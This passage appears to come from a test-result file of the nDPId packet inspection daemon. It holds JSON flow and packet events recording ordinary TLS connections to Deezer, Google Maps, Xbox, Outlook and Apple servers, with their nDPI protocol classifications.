+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482896911,"flow_last_seen":1646482896911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482896911,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1646482896911,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896911,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPpAAEAGn8vAqAGAbIrHQ6iOAbuXn2EUAAAAAKAC+vCb0AAAAgQFtAQCCApW0sF4AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1646482896918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896918,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8E58AAPcGuiZsisdDwKgBgAG7qI5txRYul59hFaAS\/\/+2KgAAAgQFoAQCCAqPYc1DVtLBeAEDAwg="} +01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1646482896921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482896921,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pPxAAEAGnczAqAGAbIrHQ6iOAbuXn2EVbcUWL4AYAfaXogAAAQEIClbSwYKPYc1DFgMBAgABAAH8AwNMrbkme+2pG6WKGaUcTfCs10ic95it0jPiimTr5KWaaiCmUwwyrZpDXgONpktntKRQJ28LAppHGUwuuBwH65AqlAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAApkZWV6ZXIuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIAS3iFI+Lml2aqbJ99HMOh2pxKpjuORM+VA6AJN2jS5cABcAQQS2OgHZ7hQeCCurKRe6Z6o4CXtv3DRVG4xO7HV8XVI+fMr+wQD4VFXUBMvHu9XDFEguxQ+LZymMWbInoPBoAAbBACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482916232,"flow_last_seen":1646482916232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482916232,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1646482916232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916232,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ooZAAEAGcYnAqAGAEkFSQ8tmAFAueWmfAAAAAKAC+vBogwAAAgQFtAQCCApZaACoAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1646482916249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916249,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Lu8AAPcGbiASQVJDwKgBgABQy2YtbN9PLnlpoKAS\/\/+hEQAAAgQFoAQCCAqviQYeWWgAqAEDAwk="} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482940480,"flow_last_seen":1646482940480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482940480,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1646482940480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA806FAAEAGYWnAqAGAjvq0jpfKAbsw63pbAAAAAKAC+vDytAAAAgQFtAQCCAoU3PsAAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1646482940487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940487,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8FycAAHkGJGSO+rSOwKgBgAG7l8rhydulMOt6XKAS\/\/9c9AAAAgQFlgQCCAqRbEHhFNz7AAEDAwg="} 
+01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1646482940491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482940491,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI506NAAEAGX2rAqAGAjvq0jpfKAbsw63pc4cnbpoAYAfb+6AAAAQEIChTc+wqRbEHhFgMBAgABAAH8AwO7ribOnVQsY1sOMkcbEYXbLY3qPQQ51Elay7+WtVSrNSAVw+m3VKjUN5Kg0hk0Rcql0l9JhorDl+A6BcRaD2MOQwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAUABIAAA9tYXBzLmdvb2dsZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgZi1V3KN\/7YwDfK8H3VIJ+hl8oG\/pcyHsJbGlMXjOc2MAFwBBBJu4yUB5A9M8e+22tNqv37PZXfAJovqkKxk\/cRDsm65QH7HDIBoXPUoAJy1c6x2wwBosAz8dzXVrLnN4Hqic9PsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482995689,"flow_last_seen":1646482995689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482995689,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1646482995689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995689,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8enxAAEAGb8fAqAGAAhGMP78GAburV\/8MAAAAAKAC+vDqEgAAAgQFtAQCCArEqeKzAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1646482995709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8kMCEYw\/wKgBgAG7vwYhgnsXq1f\/DaAS\/ohOCgAAAgQFtAQCCAocht8\/xKniswEDAwc="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1646482995711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482995711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5en5AAEAGbcjAqAGAAhGMP78GAburV\/8NIYJ7GIAYAfY3gAAAAQEICsSp4socht8\/FgMBAgABAAH8AwNFE1YF0dNQQhTDT2LTts3l72ip1ON6WYuBYFjp45zAOSCfsggN3rEBQ1caacueVCEG9V0G2r03kBuc\/FQ9ILx8tQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBhY2NvdW50Lnhib3guY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIKOdg7M8WplrJ1dHmYhafGTWEV65\/XHCmgpJRZB9OyhxABcAQQSUMlyZp7X5PylQs43MbEemG5LZD4aMK86EfSyduzhW1kr6wtZBIJI7MJb\/MCOqF0\/ebXOaYXIP5autWsClQmu8ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646483012464,"flow_last_seen":1646483012464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646483012464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1646483012464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646483012464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NmFAAEAGec\/AqAGAKGGgApuUAbvrsR4tAAAAAKAC+vCXKwAAAgQFtAQCCAqLefivAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1646483012642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646483012642,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0h61AAOYGgoooYaACwKgBgAG7m5Tksd5d67EeLoAS\/\/96NQAAAgQFtAEDAwgBAQQC"} 
+01149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1646483012643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646483012643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItNmNAAEAGd9zAqAGAKGGgApuUAbvrsR4u5LHeXlAYAfZhOgAAFgMBAgABAAH8AwO1u+oefRTEOwSLQjLjHhVV0xmNEBLIePou\/aAHVOd2CCAPyrTST2MnYmbxM2VIZnvQo7xJWWszq6XT0HB3y7IoMAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtvdXRsb29rLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBWvkXIQj27ydSlWNcrtPVAAtDjckdSwzserfJQbjqaWAAXAEEEmLcB97hFECojXeQm9a5elnWgKYRExdFmjiW10ZfBGP+icRnFpjaWBz97zhMeOCLZ79LJYWeVZvs9jOUTVoTTCAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} 
00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":458,"packets-processed":457,"total-skipped-flows":0,"total-l4-data-len":197833,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":32,"total-detection-updates":38,"total-updates":0,"current-active-flows":27,"total-active-flows":36,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":230,"global_ts_msec":1646495488872} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495488872,"flow_last_seen":1646495488872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488872,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1646495488872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488872,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8\/MhAAEAGRHDAqAGAD6Anu7NKAbvmP22QAAAAAKAC+vBpUQAAAgQFtAQCCAoE\/txmAAAAAAEDAwc="} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1646495488880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488880,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGTzkPoCe7wKgBgAG7s0optQbo5j9tkaAS9LPzBQAAAgQFtAQCCAoEQEeaBP7cZgEDAwc="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1646495488882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495488882,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5\/MpAAEAGQnHAqAGAD6Anu7NKAbvmP22RKbUG6YAYAfaZtgAAAQEICgT+3HEEQEeaFgMBAgABAAH8AwO25geT89HZVQIHdAvPqVcdroWBp1YfQbaMJ\/IT9jA01iAQ9v2Qg1QtgoSL\/wrZgtn2pCmqUafGB71JcGJ1a5vPpQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFndXp6b25pLmFwcGxlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAfoSMbRE149N9PW6YpT\/B1gLVQ\/izORnimYk5vzkOPIwAXAEEEYgA3US97mm0LBVaj+yl1ih4nt3Ma4wqV+qwTQtcgUnIu95ynuvYl8aODuWCNRrQ8KDDItT25yW1YelOufG9kvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA